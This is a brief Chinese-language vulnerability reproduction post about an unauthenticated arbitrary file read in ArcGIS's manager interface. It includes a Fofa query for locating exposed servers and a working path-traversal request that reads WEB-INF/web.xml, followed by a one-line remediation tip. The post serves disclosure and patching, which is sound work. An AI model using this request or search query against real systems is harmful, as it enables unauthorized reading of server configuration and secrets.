ArcGIS地理空间平台 manager 任意文件读取漏洞复现
0x01 产品描述:
ArcGIS是一个综合的地理空间平台,由Esri开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位。
0x02 漏洞描述:
ArcGIS地理空间平台 /arcgis/manager接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:
Fofa:app="esri-ArcGIS"
0x04 漏洞复现:
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
Host: your-ip
0x05 修复建议:
在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。